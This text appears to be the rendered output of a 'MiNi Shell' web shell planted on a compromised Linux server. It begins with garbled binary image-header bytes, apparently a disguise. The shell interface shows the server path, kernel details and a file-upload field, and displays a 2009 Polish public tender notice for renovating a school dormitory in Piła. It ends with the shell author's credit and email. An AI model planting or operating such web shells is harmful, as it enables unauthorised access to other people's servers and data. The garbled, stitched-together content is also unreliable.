JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090715/240200-N-2009.html

<p class="kh_header"><b>Piła: REMONT II PIĘTRA INTERNATU PRZY ZESPOLE SZKÓŁ IM. STANISŁAWA STASZICA W PILE</b><br>
<b>Numer ogłoszenia: 240200 - 2009; data zamieszczenia: 15.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im. Stanisława Staszica , al.  Powstańców Wielkopolskich 18, 64-920 Piła, woj. wielkopolskie, tel. 067 212 22 18, faks 067 212 51 99.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsstaszica.pila.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zsstaszica.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT II PIĘTRA INTERNATU PRZY ZESPOLE SZKÓŁ IM. STANISŁAWA STASZICA W PILE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.	Przedmiot zamówienia
3.1.	Przedmiotem zamówienia jest wykonanie robót remontowych na drugim piętrze 
            internatu przy Zespole Szkół im. Stanisława Staszica w Pile, przy al. Powst. Wlkp. 18. 
            Remont obejmuje jedno skrzydło piętra budynku. W zakres robót objętych 
            zamówieniem wchodzą:
            - roboty rozbiórkowe polegające na zerwaniu posadzek z tworzyw sztucznych, 
              wykucie z muru ościeżnic drewnianych, rozebranie ścian i filarów z cegieł, 
              wywiezienie gruzu,
           - wykonanie gruntowania powierzchni posadzek, wykonanie warstwy wyrównawczej 
             pod posadzki z zaprawy cementowej, warstwy wygładzającej z zaprawy 
             samopoziomującej, ułożenie posadzki z paneli podłogowych wraz z cokolikami, 
             wykonanie posadzki z płytek gresowych wraz z cokolikiem.
            - zabudowa naświetli drzwiowych płytą gipsowo-kartonową, montaż ościeżnic 
              drzwiowych w ścianach, montaż skrzydeł drzwiowych, montaż klamek i wkładek 
              patentowych,
            - roboty malarskie - gruntowanie powierzchni ścian i sufitów, wykonanie gładzi 
              gipsowych ścian i sufitów, przetarcie istniejącej lamperii w korytarzu, dwukrotne 
              malowanie farbą emulsyjną ścian i sufitów, ułożenie płytek ceramicznych na ścianie,
            - montaż zaworów przelotowych, rurociągu stalowego, wykonanie  podejścia 
              kanalizacyjnego PCV O 50, montaż zlewozmywaka wraz z baterią i szafką 
              zlewozmywakową,
            - wewnętrzna instalacja elektryczna - demontaż instalacji elektrycznej wraz z 
              osprzętem, demontaż tablicy bezpiecznikowej, demontaż lamp oświetleniowych, 
              wykonanie nowej instalacji elektrycznej wraz z osprzętem, montaż nowej tablicy 
              bezpiecznikowej wraz z wyposażeniem, montaż lamp oświetleniowych, wykonanie 
              pomiarów instalacji elektrycznej.
3.2	Szczegółowy opis przedmiotu zamówienia zawarty jest w przedmiarach robót i Specyfikacji Wykonania i Odbioru Robót Budowlanych - załącznik nr 6 do SIWZ.
3.3.	Zamawiający wymaga stałego nadzoru powadzonych robót, tzn. kierownik robót w czasie trwania prac musi być cały czas obecny na budowie.
3.4.	Okres gwarancji jakości na wykonane roboty - nie krótszy niż 36 miesięcy, a na wbudowaną stolarkę drzwiową 60 miesięcy.
3.5.	Cena oferty:
3.5.1.   Cena oferty będzie ceną ryczałtową. Wykonawca określi w formularzu oferty cenę za 
            całość wykonania zadania. Załączony przedmiar robót jest dokumentem pomocniczym 
            dla Wykonawcy. Opis sposobu obliczenia ceny oferty zawarty jest w punkcie 21 
            SIWZ.
3.5.2.   Cena oferty nie może być zmieniona w tracie wykonywania robót. Zamawiający 
            zaleca przeprowadzenie wizji lokalnej w budynku internatu, gdzie będą wykonywane 
             roboty.
3.6. 	Warunki zapłaty
3.6.1	Wykonawca wystawi jedną fakturę VAT za całość robót.
3.6.2. 	Termin zapłaty faktury - 14 dni od doręczenia faktury Zamawiającemu.
3.6.3. 	Zapłata należności za fakturę będzie uwarunkowana:
a) bezusterkowym odbiorem końcowym robót,
b) rozliczeniem się Wykonawcy z podwykonawcami (jeżeli takich zatrudni)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.42.10.00-4, 45.44.21.00-8, 45.43.10.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 22. Wymagania dotyczące wadium
22.1.	Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości: 4 000 złotych ( słownie: cztery tysiące złotych).
22.2.	Wadium winno być wniesione przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:
a)	pieniądzu, wpłaconym przelewem na rachunek bankowy Zamawiającego w 
39102038440000120201012889

         b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
             kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym.
         c) gwarancjach bankowych,
         d) gwarancjach ubezpieczeniowych,
         e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 
             ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju 
             Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
         Dowód wniesienia wadium powinien być dołączony do oferty.
         Uwaga:  W przypadku wnoszenia wadium w formie gwarancji lub poręczeń, 
         oryginału dokumentu wadialnego nie należy trwale łączyć z dokumentami oferty. 
         W dokumenty oferty należy wpiąć kopię, a oryginał złożyć wraz z ofertą np. w 
         kopercie.
         Wadium, o którym mowa w ppkt a) zostanie uznane za wpłacone w terminie, jedynie 
         pod warunkiem, że pieniądze znajdą się na koncie Zamawiającego przed upływem  
         terminu składania ofert. 
         W przypadku Wykonawców składających wspólną ofertę, wadium winno być wniesione 
         przez ustanowionego pełnomocnika (lidera) w imieniu wszystkich Wykonawców 
         składających wspólną ofertę.
22.3. Wadium musi obejmować cały okres związania ofertą. Gwarancje bankowe, 
         ubezpieczeniowe, lub poręczenia winny posiadać ważność od dnia składania i otwarcia 
         ofert.
22.4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
         Wykonawca, który nie wniesie wadium w formie lub formach, o których mowa 
         w pkt. 22.2. zostanie wykluczony z postępowania.
22.5. Zamawiający dokona niezwłocznie zwrotu wadium, jeżeli:
         a)  upłynie termin związania ofertą;
         b)  zostanie zawarta umowa i wniesione zabezpieczenie należytego wykonania umowy;
         c)  Zamawiający unieważni postępowanie, a protesty zostaną ostatecznie rozstrzygnięte 
              lub upłynie termin ich wnoszenia.
22.6. Zamawiający dokona niezwłocznie zwrotu wadium na pisemny wniosek Wykonawcy:
         a)  który wycofał ofertę przed upływem terminu do składania ofert;
         b)  który został wykluczony z postępowania;
         c)  którego oferta została odrzucona z innych przyczyn, niż wskazane w pkt. b).
22.7. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym 
         zwrócono wadium po ich wykluczeniu z postępowania, lub oferta została odrzucona, 
         jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność 
         wykluczenia wykonawcy, lub odrzucenia oferty. W takim przypadku wykonawcy 
         ponownie wnoszą wadium w terminie określonym przez Zamawiającego.
22.8. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami 
         wynikającymi z umowy rachunku bankowego, na którym jest ono przechowywane, 
         pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew 
         pieniędzy na rachunek wskazany przez Wykonawcę.
22.9. Wykonawca, utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
a)	Wykonawca odmówi podpisania umowy w sprawie niniejszego zamówienia 
publicznego na warunkach określonych w ofercie;
b)	Wykonawca nie wniesie zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
d)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. upup nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 6.	Warunki, jakie muszą spełniać Wykonawcy
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
6.1. 	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 upzp.
6.2. 	Posiadają niezbędną wiedzę i doświadczenie i udokumentują, że w ciągu ostatnich 5 lat jako wykonawca budowlany wykonywali roboty o zakresie i wartości podobnym do robót objętych przedmiotem zamówienia. Zamawiający wymaga udokumentowania wykonania co najmniej dwóch robót o wartości minimum 150 000 złotych każda.
6.3.	Zobowiążą się do zatrudnienia kierownika robót z uprawnieniami.
6.4.	Znajdują się w sytuacji ekonomicznej gwarantującej wykonanie zamówienia i w tym względzie udokumentują, że posiadają środki obrotowe lub zdolność kredytową w na kwotę nie mniejszą niż 200 000 złotych.
6.5. 	Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
6.6. 	Wskażą w ofercie części zamówienia, których wykonanie powierzą podwykonawcom.
	Jeśli Wykonawca zamierza podzlecić roboty podwykonawcy/om to jest zobowiązany podać w ofercie nazwy podzlecanych robót i ich wartość.
	W przypadku zatrudnienia podwykonawcy/ów zapłata ostatniej faktury za roboty uzależniona będzie od udokumentowania rozliczenia się Wykonawcy z podwykonawcą (solidarna odpowiedzialność za wynagrodzenie podwykonawcy inwestora i wykonawcy).
Wymienione wyżej warunki zostaną uznane przez Zamawiającego za spełnione, jeżeli złożone przez Wykonawcę, wymagane dokumenty, o których mowa w punkcie 7 niniejszej SIWZ, potwierdzą ich spełnianie.
Ocena spełniania poszczególnych warunków odbędzie się na zasadzie spełnia, nie spełnia. Nie spełnienie choćby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7. 	Oświadczenia i dokumenty składające się na ofertę:
Dokumenty wymagane dla potwierdzenia warunków, jakie muszą spełniać Wykonawcy.
7.1.	Wypełniony formularz oferty.
7.2. 	Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 ustawy Pzp, na formularzu stanowiącym załącznik nr 2.
7.3. 	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.4. 	Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż trzy miesiące przed upływem terminu składania ofert.
7.5. 	Oświadczenie Wykonawcy, że reprezentowana przez Niego firma nie jest w stanie upadłości, ani nie otwarto jej likwidacji.
7.6. 	Informację o doświadczeniu Wykonawcy - wykaz wykonanych w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót - załącznik Nr 3 do SIWZ.
	Do informacji należy załączyć dokumenty potwierdzające, że wymienione roboty zostały wykonane należycie. Dokumenty te powinny być wystawione przez inwestora (zamawiającego). Roboty w wykazie nie potwierdzone w/w dokumentami nie będą brane pod uwagę przez Zamawiającego.
7.7. 	Informacje o kwalifikacjach kierownika robót proponowanego do zatrudnienia na budowie w realizacji robót  załącznik Nr 4 do SIWZ. Do informacji załączyć kserokopie uprawnień budowlanych i aktualnych zaświadczeń potwierdzających  przynależność do Krajowej Izby Inżynierów budownictwa lub właściwej izby samorządu zawodowego architektów, inżynierów budownictwa oraz urbanistów, zgodnie z art. 6 ustawy z dnia 15 grudnia 2000 r. o samorządzie zawodowym architektów, inżynierów budownictwa i urbanistów (Dz. U. z 2001r. Nr 5, poz. 42). 
7.8. 	Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
7.9. 	Polisa lub inny dokument ubezpieczenia.
7.10. Informacja o zatrudnieniu podwykonawców robót - na formularzu zgodnym z treścią załącznika Nr 5 do SIWZ. 
7.11. Harmonogram robót.
7.12. Dowód wniesienia wadium.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zsstaszica.pila.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.zsstaszica.pila.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2009 godzina 10:00, miejsce: Zespół Szkół im. Stanisława Staszica 
Al. Powstańców 18, 64-920 Piła
w sekretariacie szkolnym.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com